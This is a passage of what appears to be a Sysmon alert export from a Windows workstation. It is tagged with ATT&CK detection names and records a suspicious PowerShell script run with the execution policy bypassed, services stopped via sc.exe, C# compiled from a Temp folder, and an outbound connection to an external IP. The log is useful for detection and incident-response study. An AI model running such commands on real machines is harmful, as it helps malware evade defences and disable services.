{df9fc3d3-b35d-5ecf-0000-00108b1e1900} +ProcessId: 6716 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop SVSHost +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop SVSHost",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:33.669997200Z"",""eventRecordID"":""2022"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:33.664\r\nProcessGuid: {df9fc3d3-b35d-5ecf-0000-00108b1e1900}\r\nProcessId: 6716\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop SVSHost\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:33.664"",""processGuid"":""{df9fc3d3-b35d-5ecf-0000-00108b1e1900}"",""processId"":""6716"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop SVSHost"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:01.526",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:33.618 +ProcessGuid: {df9fc3d3-b35d-5ecf-0000-0010ce1b1900} +ProcessId: 6428 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop xWinWpdSrv +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop xWinWpdSrv",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:33.621467200Z"",""eventRecordID"":""2019"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:33.618\r\nProcessGuid: {df9fc3d3-b35d-5ecf-0000-0010ce1b1900}\r\nProcessId: 6428\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop xWinWpdSrv\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:33.618"",""processGuid"":""{df9fc3d3-b35d-5ecf-0000-0010ce1b1900}"",""processId"":""6428"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop xWinWpdSrv"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:01.493",14,"ATT&CK T1500: Suspicious Csc.exe Source File Folder","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:33.536 +ProcessGuid: {df9fc3d3-b35d-5ecf-0000-0010b2161900} +ProcessId: 4756 +Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe +FileVersion: 4.8.3752.0 built by: NET48REL1 +Description: Visual C# Command Line Compiler +Product: Microsoft® .NET Framework +Company: Microsoft Corporation +OriginalFileName: csc.exe +CommandLine: ""C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\John Williams\AppData\Local\Temp\uwgfgufv.cmdline"" +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=28D96A80131C05E552066C798C0D8ACB,SHA256=C5270C0D8718C66382240DB538F9BACDED8DB55424768C2D942A6210B96B2720,IMPHASH=EE1E569AD02AA1F7AECA80AC0601D80D +ParentProcessGuid: {df9fc3d3-b358-5ecf-0000-0010a3db1800} +ParentProcessId: 1116 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\"" /noconfig /fullpaths @\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\uwgfgufv.cmdline\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:33.550119500Z"",""eventRecordID"":""2017"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:33.536\r\nProcessGuid: {df9fc3d3-b35d-5ecf-0000-0010b2161900}\r\nProcessId: 4756\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nFileVersion: 4.8.3752.0 built by: NET48REL1\r\nDescription: Visual C# Command Line Compiler\r\nProduct: Microsoft® .NET Framework\r\nCompany: Microsoft Corporation\r\nOriginalFileName: csc.exe\r\nCommandLine: \""C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\"" /noconfig /fullpaths @\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\uwgfgufv.cmdline\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=28D96A80131C05E552066C798C0D8ACB,SHA256=C5270C0D8718C66382240DB538F9BACDED8DB55424768C2D942A6210B96B2720,IMPHASH=EE1E569AD02AA1F7AECA80AC0601D80D\r\nParentProcessGuid: {df9fc3d3-b358-5ecf-0000-0010a3db1800}\r\nParentProcessId: 1116\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:33.536"",""processGuid"":""{df9fc3d3-b35d-5ecf-0000-0010b2161900}"",""processId"":""4756"",""image"":""C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\csc.exe"",""fileVersion"":""4.8.3752.0 built by: NET48REL1"",""description"":""Visual C# Command Line Compiler"",""product"":""Microsoft® .NET Framework"",""company"":""Microsoft Corporation"",""originalFileName"":""csc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\csc.exe\\\"" /noconfig /fullpaths @\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\uwgfgufv.cmdline\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=28D96A80131C05E552066C798C0D8ACB,SHA256=C5270C0D8718C66382240DB538F9BACDED8DB55424768C2D942A6210B96B2720,IMPHASH=EE1E569AD02AA1F7AECA80AC0601D80D"",""parentProcessGuid"":""{df9fc3d3-b358-5ecf-0000-0010a3db1800}"",""parentProcessId"":""1116"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:00.321",8,"ATT&CK T1086: PowerShell Network Connections","""Network connection detected: +RuleName: +UtcTime: 2020-05-28 12:49:30.729 +ProcessGuid: {df9fc3d3-b349-5ecf-0000-0010fbcf1600} +ProcessId: 2268 +Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +User: DESKTOP-HUE026H\John Williams +Protocol: tcp +Initiated: true +SourceIsIpv6: false +SourceIp: 172.16.2.2 +SourceHostname: DESKTOP-HUE026H.localdomain +SourcePort: 49973 +SourcePortName: +DestinationIsIpv6: false +DestinationIp: 167.99.154.202 +DestinationHostname: +DestinationPort: 80 +DestinationPortName: http""",,,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""3"",""version"":""5"",""level"":""4"",""task"":""3"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:31.963664000Z"",""eventRecordID"":""2013"",""processID"":""2260"",""threadID"":""2980"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Network connection detected:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:30.729\r\nProcessGuid: {df9fc3d3-b349-5ecf-0000-0010fbcf1600}\r\nProcessId: 2268\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nUser: DESKTOP-HUE026H\\John Williams\r\nProtocol: tcp\r\nInitiated: true\r\nSourceIsIpv6: false\r\nSourceIp: 172.16.2.2\r\nSourceHostname: DESKTOP-HUE026H.localdomain\r\nSourcePort: 49973\r\nSourcePortName: \r\nDestinationIsIpv6: false\r\nDestinationIp: 167.99.154.202\r\nDestinationHostname: \r\nDestinationPort: 80\r\nDestinationPortName: http\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:30.729"",""processGuid"":""{df9fc3d3-b349-5ecf-0000-0010fbcf1600}"",""processId"":""2268"",""image"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""protocol"":""tcp"",""initiated"":""true"",""sourceIsIpv6"":""false"",""sourceIp"":""172.16.2.2"",""sourceHostname"":""DESKTOP-HUE026H.localdomain"",""sourcePort"":""49973"",""destinationIsIpv6"":""false"",""destinationIp"":""167.99.154.202"",""destinationPort"":""80"",""destinationPortName"":""http""}}}", +"May 29, 2020 @ 14:17:58.072",14,"ATT&CK T1500: Suspicious Csc.exe Source File Folder","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:29.680 +ProcessGuid: {df9fc3d3-b359-5ecf-0000-0010b3fb1800} +ProcessId: 4660 +Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe +FileVersion: 4.8.3752.0 built by: NET48REL1 +Description: Visual C# Command Line Compiler +Product: Microsoft® .NET Framework +Company: Microsoft Corporation +OriginalFileName: csc.exe +CommandLine: ""C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\John Williams\AppData\Local\Temp\ho45fetr.cmdline"" +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=28D96A80131C05E552066C798C0D8ACB,SHA256=C5270C0D8718C66382240DB538F9BACDED8DB55424768C2D942A6210B96B2720,IMPHASH=EE1E569AD02AA1F7AECA80AC0601D80D +ParentProcessGuid: {df9fc3d3-b349-5ecf-0000-0010fbcf1600} +ParentProcessId: 2268 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ""-Command"" ""if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\Users\John Williams\Downloads\program25.ps1'""""","\""C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\"" /noconfig /fullpaths @\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\ho45fetr.cmdline\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:29.682074600Z"",""eventRecordID"":""2010"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:29.680\r\nProcessGuid: {df9fc3d3-b359-5ecf-0000-0010b3fb1800}\r\nProcessId: 4660\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nFileVersion: 4.8.3752.0 built by: NET48REL1\r\nDescription: Visual C# Command Line Compiler\r\nProduct: Microsoft® .NET Framework\r\nCompany: Microsoft Corporation\r\nOriginalFileName: csc.exe\r\nCommandLine: \""C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\"" /noconfig /fullpaths @\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\ho45fetr.cmdline\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=28D96A80131C05E552066C798C0D8ACB,SHA256=C5270C0D8718C66382240DB538F9BACDED8DB55424768C2D942A6210B96B2720,IMPHASH=EE1E569AD02AA1F7AECA80AC0601D80D\r\nParentProcessGuid: {df9fc3d3-b349-5ecf-0000-0010fbcf1600}\r\nParentProcessId: 2268\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" \""-Command\"" \""if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\\Users\\John Williams\\Downloads\\program25.ps1'\""\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:29.680"",""processGuid"":""{df9fc3d3-b359-5ecf-0000-0010b3fb1800}"",""processId"":""4660"",""image"":""C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\csc.exe"",""fileVersion"":""4.8.3752.0 built by: NET48REL1"",""description"":""Visual C# Command Line Compiler"",""product"":""Microsoft® .NET Framework"",""company"":""Microsoft Corporation"",""originalFileName"":""csc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\csc.exe\\\"" /noconfig /fullpaths @\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\ho45fetr.cmdline\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=28D96A80131C05E552066C798C0D8ACB,SHA256=C5270C0D8718C66382240DB538F9BACDED8DB55424768C2D942A6210B96B2720,IMPHASH=EE1E569AD02AA1F7AECA80AC0601D80D"",""parentProcessGuid"":""{df9fc3d3-b349-5ecf-0000-0010fbcf1600}"",""parentProcessId"":""2268"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" \\\""-Command\\\"" \\\""if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\\\\Users\\\\John Williams\\\\Downloads\\\\program25.ps1'\\\""""}}}", +"May 29, 2020 @ 14:17:56.925",10,"ATT&CK T1086: Non Interactive PowerShell","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:29.212 +ProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ProcessId: 6056 +Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Windows PowerShell +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: PowerShell.EXE +CommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=CDA48FC75952AD12D99E526D0B6BF70A,SHA256=908B64B1971A979C7E3E8CE4621945CBA84854CB98D76367B791A6E22B5F6D53,IMPHASH=A7CEFACDDA74B13CD330390769752481 +ParentProcessGuid: {df9fc3d3-b349-5ecf-0000-0010fbcf1600} +ParentProcessId: 2268 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ""-Command"" ""if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\Users\John Williams\Downloads\program25.ps1'""""","\""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:29.219402100Z"",""eventRecordID"":""2006"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:29.212\r\nProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nProcessId: 6056\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=CDA48FC75952AD12D99E526D0B6BF70A,SHA256=908B64B1971A979C7E3E8CE4621945CBA84854CB98D76367B791A6E22B5F6D53,IMPHASH=A7CEFACDDA74B13CD330390769752481\r\nParentProcessGuid: {df9fc3d3-b349-5ecf-0000-0010fbcf1600}\r\nParentProcessId: 2268\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" \""-Command\"" \""if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\\Users\\John Williams\\Downloads\\program25.ps1'\""\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:29.212"",""processGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""processId"":""6056"",""image"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Windows PowerShell"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""PowerShell.EXE"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=CDA48FC75952AD12D99E526D0B6BF70A,SHA256=908B64B1971A979C7E3E8CE4621945CBA84854CB98D76367B791A6E22B5F6D53,IMPHASH=A7CEFACDDA74B13CD330390769752481"",""parentProcessGuid"":""{df9fc3d3-b349-5ecf-0000-0010fbcf1600}"",""parentProcessId"":""2268"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" \\\""-Command\\\"" \\\""if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\\\\Users\\\\John Williams\\\\Downloads\\\\program25.ps1'\\\""""}}}", +"May 29, 2020 @ 14:17:56.868",10,"ATT&CK T1086: Non Interactive PowerShell","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:28.498 +ProcessGuid: {df9fc3d3-b358-5ecf-0000-0010a3db1800} +ProcessId: 1116 +Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Windows PowerShell +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: PowerShell.EXE +CommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 